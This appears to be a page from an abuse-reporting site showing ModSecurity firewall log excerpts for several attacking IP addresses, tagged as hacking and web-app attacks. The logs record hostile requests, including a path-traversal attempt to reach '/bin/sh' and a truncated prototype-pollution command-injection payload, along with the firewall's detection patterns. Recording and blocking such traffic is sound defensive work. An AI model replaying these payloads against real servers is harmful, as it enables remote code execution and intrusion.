[Sun Sep 06 11:49:38.194832 2026] [security2:error] [pid 1123738:tid 1123738] [client 107.155.48.46:38278] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "773"] [id "920350"] [msg "Host header is a numeric IP address"] [data "186.32.240.17:443"] [severity "WARNING"] [ver "OWASP_CRS/4.27.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "186.32.240.17"] [uri "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"] [unique_id "ap2nslbUTmPppNhCwqfp7wAAAAE"]
[Sun Sep 06 11:49:38.194978 2026] [security2:error] [pid 1123738:tid 1123738] [client 107.155.48.46:38278] ModSecurity: Warning. Match of "within %{tx.allowed_request_content_type}" against
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
πΊπΈ
45.61.149.189
|
|
[Sun Sep 06 11:18:36.658245 2026] [security2:error] [pid 1052624:tid 1052624] [client 45.61.149.189: ...
show more
[Sun Sep 06 11:18:36.658245 2026] [security2:error] [pid 1052624:tid 1052624] [client 45.61.149.189:56302] ModSecurity: Warning. Pattern match "(?:^([\\\\d.]+|\\\\[[\\\\da-f:]+\\\\]|[\\\\da-f:]+)(:[\\\\d]+)?$)" at REQUEST_HEADERS:Host. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "773"] [id "920350"] [msg "Host header is a numeric IP address"] [data "186.32.240.17:443"] [severity "WARNING"] [ver "OWASP_CRS/4.27.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "186.32.240.17"] [uri "/webclient/"] [unique_id "ap2gbIZKDA5xKmCJsZtLpgAAAAU"]
[Sun Sep 06 11:18:36.660063 2026] [security2:error] [pid 1052624:tid 1052624] [client 45.61.149.189:56302] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/current/rules/RESPONSE-980-CORRELATION.conf"] [line "
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
πΊπΈ
43.153.10.13
|
|
[Sun Sep 06 10:33:41.091300 2026] [security2:error] [pid 1045342:tid 1045342] [client 43.153.10.13:5 ...
show more
[Sun Sep 06 10:33:41.091300 2026] [security2:error] [pid 1045342:tid 1045342] [client 43.153.10.13:52790] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/modsecurity/crs/current/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "566"] [id "920280"] [msg "Request Missing a Host Header"] [severity "CRITICAL"] [ver "OWASP_CRS/4.27.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL-ENFORCEMENT"] [tag "capec/1000/210/272"] [hostname "cursos.robertomurillo.net"] [uri "/"] [unique_id "ap2V5VUV2aRPCFxb90IeAgAAAAM"]
[Sun Sep 06 10:33:41.092772 2026] [security2:error] [pid 1045342:tid 1045342] [client 43.153.10.13:52790] ModSecurity: Warning. Unconditional match in SecAction. [file "/etc/modsecurity/crs/current/rules/RESPONSE-980-CORRELATION.conf"] [line "99"] [id "980170"] [msg "Anomaly Scores: (Inbound Scores: blocking=5, detection=5, per_pl=5-0-0-0
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|
|
π¬π§
16.61.150.193
|
|
[Sun Sep 06 09:34:33.422808 2026] [security2:error] [pid 1081481:tid 1081481] [client 16.61.150.193: ...
show more
[Sun Sep 06 09:34:33.422808 2026] [security2:error] [pid 1081481:tid 1081481] [client 16.61.150.193:58144] ModSecurity: Warning. Pattern match "(?i)(?:b[\\"'\\\\)\\\\[\\\\x5c]*(?:(?:(?:\\\\|\\\\||&&)[\\\\s\\\\x0b]*)?\\\\$[!#\\\\(\\\\*\\\\-0-9\\\\?@_a-\\\\{]*)?\\\\x5c?u[\\"'\\\\)\\\\[\\\\x5c]*(?:(?:(?:\\\\|\\\\||&&)[\\\\s\\\\x0b]*)?\\\\$[!#\\\\(\\\\*\\\\-0-9\\\\?@_a-\\\\{]*)?\\\\x5c?s[\\"'\\\\)\\\\[\\\\x5c]*(?:(?:(?:\\\\|\\\\||&&)[\\\\s\\\\x0b]*)?\\\\$[!#\\\\(\\\\*\\\\-0-9\\ ..." at ARGS:0. [file "/etc/modsecurity/crs/current/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "205"] [id "932235"] [msg "Remote Command Execution: Unix Command Injection (command without evasion)"] [data "Matched Data: | base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.main
...
show less
|
Web Spam
Hacking
SQL Injection
Brute-Force
Web App Attack
|